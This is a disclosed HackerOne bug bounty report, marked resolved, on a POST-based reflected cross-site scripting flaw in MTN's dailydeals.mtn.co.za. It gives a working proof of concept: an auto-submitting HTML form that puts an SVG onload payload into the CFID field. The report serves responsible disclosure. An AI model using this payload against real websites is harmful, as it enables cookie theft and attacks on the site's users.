POST BASED REFLECTED XSS IN dailydeals.mtn.co.za

Disclosed: 2022-07-15 09:56:35 By shuvam321 To mtn_group
High
Vulnerability Details
## Summary: Dear Team , I have found a post based reflected XSS in https://dailydeals.mtn.co.za/ . ## Steps To Reproduce: 1.Create a html file with following content . <form action="https://dailydeals.mtn.co.za/index.cfm?GO=CRAVE_ESTABLISHMENTS_LIST" method="POST"><input type="hidden" name="location_id" value="0"><input type="hidden" name="suburb" value="0"><input type="hidden" name="search_phrase" value=""><input type="hidden" name="submit_search" value="Search"><input type="hidden" name="m" value=""><input type="hidden" name="cpID" value=""><input type="hidden" name="CFID" value="a611fd5d-822a-4c08-a032-bcac1551f032'&quot;<!--><Svg OnLoad=(confirm)(1)-->"><input type="hidden" name="CFTOKEN" value="0"></form><script>document.forms[0].submit()</script> 2.Open the HTML file in any web-browser. 3.Cross site Scripting will be triggered . ## Impact Attacker can exploit this vulnerability to steal users cookies , redirect them to arbitrary domain and perform various attacks.
Actions
View on HackerOne
Report Stats
  • Report ID: 1451394
  • State: Closed
  • Substate: resolved
  • Upvotes: 34
Share this report